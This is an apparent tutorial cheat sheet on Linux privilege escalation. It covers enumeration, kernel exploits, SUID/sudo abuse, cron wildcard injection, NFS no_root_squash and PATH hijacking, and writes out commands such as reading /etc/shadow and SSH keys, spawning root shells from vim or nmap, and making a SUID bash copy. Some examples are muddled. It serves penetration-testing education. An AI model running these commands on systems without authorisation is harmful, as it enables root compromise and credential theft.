Master Linux Privilege Escalation: Techniques, Commands, and Exploits

0x001 Linux Privilege Escalation Overview

Privilege escalation is the process of gaining higher privileges than originally granted, typically to read/write sensitive files, maintain persistence, or install backdoors. Escalation can be horizontal (between regular users) or vertical (to root/administrator).

Common Techniques

Kernel vulnerabilities

Programs running as root

Installed software with exploitable versions

Weak or reused passwords and plaintext credentials

Misconfigured internal services

SUID/SGID misconfigurations

Abuse of sudo rights

Writable scripts called by root

PATH configuration errors

Cron jobs

0x002 Basic Linux Information Gathering

System Identification

cat /etc/issue

cat /etc/*-release

uname -a

uname -m

(architecture) uname -r (kernel version)

Environment and PATH

env

cat /etc/profile

cat ~/.bashrc

echo $PATH

Running Services

ps aux

ps aux | grep root

netstat -antup

Configuration Files

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/sudoers

crontab -l

cat /etc/crontab

File System Exploration

find / -perm -222 -type d

(world‑writable directories) find / -perm -4000 -type f (SUID binaries) find / -perm -2000 -type f (SGID binaries) cat /etc/passwd, cat /etc/shadow,

cat ~/.ssh/id_rsa

0x003 Automated Enumeration Scripts

LinEnum – https://github.com/rebootuser/LinEnum

Unix‑privesc‑check – http://pentestmonkey.net/tools/audit/unix-privesc-check

Linprivchecker.py – https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py

0x004 Kernel Vulnerability Exploitation

Successful kernel exploitation requires a vulnerable kernel, a matching exploit, the ability to transfer the exploit to the target, and execution rights on the target. Keep kernels patched and limit file‑transfer utilities (ftp, wget, curl) to trusted users.

Kernel Information Commands

uname -a

– full system info uname -m – architecture (32/64‑bit) uname -r – kernel release cat /proc/version – kernel version details cat /etc/*-release – distribution info

Example: DirtyCow (CVE‑2016‑5195) can replace /etc/passwd entries to create a new root‑privileged user.

0x005 Exploiting Services Running as Root

Identify services that run as root and check for vulnerable binaries or misconfigurations.

ps aux | grep root

netstat -antup

MySQL UDF exploits can execute arbitrary commands if MySQL runs as root.

0x006 SUID/SGID Misconfigurations

SUID allows a binary to run with the file owner’s privileges; SGID does the same for the group. Common exploitable binaries include nmap, vim, find, awk, less, more, cp, mv, nano, and wget.

Finding SUID/SGID Files

find / -perm -4000 -type f 2>/dev/null   # SUID files
find / -perm -2000 -type f 2>/dev/null   # SGID files

Typical Escalation Commands

sudo nmap --interactive

then

!sh

sudo vim -c '!sh'

sudo less /etc/passwd !/bin/sh

sudo cp /bin/bash /tmp/bash && chmod +s /tmp/bash

0x007 Cron Job Abuse

Cron jobs run scheduled commands, often as root. If a script or binary invoked by a root cron job is writable by a low‑privilege user, the attacker can modify it to gain root.

Discovery Commands

crontab -l

ls -la /etc/cron*

cat /etc/crontab

Example: Overwrite a writable script used by a root cron job, place a set‑uid binary in the same directory, and obtain a root shell.

Wildcard Injection in Cron

# Create a reference file owned by the attacker
touch reference
# Create a crafted file that will be interpreted as a flag
touch -- --reference=reference
# If a later <em>chown</em> command runs with "*", it will affect /etc/passwd via the symlink
ln -s /etc/passwd malicious_link

0x008 NFS Weak Permissions

If an NFS export is configured with no_root_squash and write permissions, an attacker can mount the share, write a set‑uid binary, and execute it as root.

Typical Workflow

Discover exports: showmount -e [IP] Mount the share: mount -o rw,vers=2 [IP]:/tmp /tmp/nfs Create a C program that sets UID to 0 and spawns a shell, compile it, and set the SUID bit.

Execute the binary to obtain a root shell.

0x009 PATH Misconfiguration (".")

Placing a literal dot (.) at the beginning of PATH causes the shell to search the current directory before system directories. An attacker can place a malicious executable named after a common command (e.g., ls) and have it executed with elevated privileges when a privileged user runs the command.

# Example of a vulnerable PATH
PATH=.:$PATH   # Adds '.' at the start
# Attacker creates a malicious 'ls' in their directory
ls   # Executes the attacker's script instead of the legitimate binary

Defence: Do not place '.' at the start of PATH for privileged accounts.